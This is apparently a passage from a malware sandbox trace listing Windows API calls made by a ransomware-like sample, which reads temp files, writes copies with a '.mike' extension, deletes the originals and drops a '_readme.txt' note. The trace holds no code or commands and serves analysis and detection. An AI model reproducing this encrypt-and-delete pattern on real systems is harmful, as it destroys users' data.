lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.427] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.427] GetFileType (hFile=0x1d4) returned 0x1 [0147.427] GetFileType (hFile=0x1d4) returned 0x1 [0147.430] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=71680, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x11800 [0147.431] ReadFile (in: hFile=0x1d4, lpBuffer=0x2107ce8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2107ce8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.432] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", lpFilePart=0x0) returned 0x43 [0147.432] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.432] GetFileType (hFile=0x1d4) returned 0x1 [0147.433] GetFileType (hFile=0x1d4) returned 0x1 [0147.433] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x11a20 [0147.433] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.434] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.434] GetFileType (hFile=0x1d4) returned 0x1 [0147.434] GetFileType (hFile=0x1d4) returned 0x1 [0147.434] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=81920, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x14000 [0147.435] ReadFile (in: hFile=0x1d4, lpBuffer=0x2114c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2114c90*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.436] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", lpFilePart=0x0) returned 0x43 [0147.436] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.437] GetFileType (hFile=0x1d4) returned 0x1 [0147.437] GetFileType (hFile=0x1d4) returned 0x1 [0147.437] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x14220 [0147.437] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.438] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.438] GetFileType (hFile=0x1d4) returned 0x1 [0147.438] GetFileType (hFile=0x1d4) returned 0x1 [0147.439] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=92160, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x16800 [0147.439] ReadFile (in: hFile=0x1d4, lpBuffer=0x2121c38, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2121c38*, lpNumberOfBytesRead=0x2af080*=0x21f4, lpOverlapped=0x0) returned 1 [0147.440] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", lpFilePart=0x0) returned 0x43 [0147.440] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.440] GetFileType (hFile=0x1d4) returned 0x1 [0147.440] GetFileType (hFile=0x1d4) returned 0x1 [0147.441] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x16a20 [0147.441] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", lpFilePart=0x0) returned 0x43 [0147.441] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.442] GetFileType (hFile=0x1d4) returned 0x1 [0147.442] GetFileType (hFile=0x1d4) returned 0x1 [0147.443] WriteFile (in: hFile=0x1d4, lpBuffer=0x21338c8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21338c8*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0147.443] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.444] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", lpFilePart=0x0) returned 0x43 [0147.444] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2123b6e0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x2123b6e0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x212adb00, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x18c20)) returned 1 [0147.444] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.444] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike", lpFilePart=0x0) returned 0x43 [0147.445] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls.mike"), fInfoLevelId=0x0, lpFileInformation=0x2134f80 | out: lpFileInformation=0x2134f80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2123b6e0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x2123b6e0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x212adb00, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x18c20)) returned 1 [0147.445] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.445] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", dwFileAttributes=0x80) returned 1 [0147.446] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aec98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.446] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls")) returned 1 [0147.448] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.448] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\t4pa14oyz.xls"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0147.448] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\T4pA14oYz.xls", lpFilePart=0x0) returned 0x3e [0147.448] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", lpFilePart=0x0) returned 0x3c [0147.449] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d4 [0147.450] GetFileType (hFile=0x1d4) returned 0x1 [0147.450] GetFileType (hFile=0x1d4) returned 0x1 [0147.450] WriteFile (in: hFile=0x1d4, lpBuffer=0x2136ba0*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af0b8, lpOverlapped=0x0 | out: lpBuffer=0x2136ba0*, lpNumberOfBytesWritten=0x2af0b8*=0x45e, lpOverlapped=0x0) returned 1 [0147.451] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tGVrLRIfo.m4a", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tGVrLRIfo.m4a", lpFilePart=0x0) returned 0x3e [0147.451] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.452] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.452] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.452] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.452] GetFileType (hFile=0x1d4) returned 0x1 [0147.453] GetFileType (hFile=0x1d4) returned 0x1 [0147.453] CloseHandle (hObject=0x1d4) returned 1 [0147.453] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.453] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.453] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0147.454] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0147.454] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps"), fInfoLevelId=0x0, lpFileInformation=0x213b418 | out: lpFileInformation=0x213b418*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c58ca20, ftCreationTime.dwHighDateTime=0x1d4c889, ftLastAccessTime.dwLowDateTime=0xd3622740, ftLastAccessTime.dwHighDateTime=0x1d4c9d1, ftLastWriteTime.dwLowDateTime=0xd3622740, ftLastWriteTime.dwHighDateTime=0x1d4c9d1, nFileSizeHigh=0x0, nFileSizeLow=0x17a4f)) returned 1 [0147.454] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.455] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps"), fInfoLevelId=0x0, lpFileInformation=0x213b748 | out: lpFileInformation=0x213b748*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c58ca20, ftCreationTime.dwHighDateTime=0x1d4c889, ftLastAccessTime.dwLowDateTime=0xd3622740, ftLastAccessTime.dwHighDateTime=0x1d4c9d1, ftLastWriteTime.dwLowDateTime=0xd3622740, ftLastWriteTime.dwHighDateTime=0x1d4c9d1, nFileSizeHigh=0x0, nFileSizeLow=0x17a4f)) returned 1 [0147.455] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.455] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", lpFilePart=0x0) returned 0x4c [0147.456] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0147.456] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.456] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.456] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.457] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", lpFilePart=0x0) returned 0x4c [0147.457] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0147.457] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", lpFilePart=0x0) returned 0x4c [0147.458] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.458] GetFileType (hFile=0x1d4) returned 0x1 [0147.459] GetFileType (hFile=0x1d4) returned 0x1 [0147.459] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0147.459] WriteFile (in: hFile=0x1d4, lpBuffer=0x213c62c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x213c62c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0147.460] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps"), fInfoLevelId=0x0, lpFileInformation=0x213c104 | out: lpFileInformation=0x213c104*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c58ca20, ftCreationTime.dwHighDateTime=0x1d4c889, ftLastAccessTime.dwLowDateTime=0xd3622740, ftLastAccessTime.dwHighDateTime=0x1d4c9d1, ftLastWriteTime.dwLowDateTime=0xd3622740, ftLastWriteTime.dwHighDateTime=0x1d4c9d1, nFileSizeHigh=0x0, nFileSizeLow=0x17a4f)) returned 1 [0147.461] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.461] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.462] GetFileType (hFile=0x1d4) returned 0x1 [0147.462] GetFileType (hFile=0x1d4) returned 0x1 [0147.462] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0147.462] ReadFile (in: hFile=0x1d4, lpBuffer=0x213d76c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, 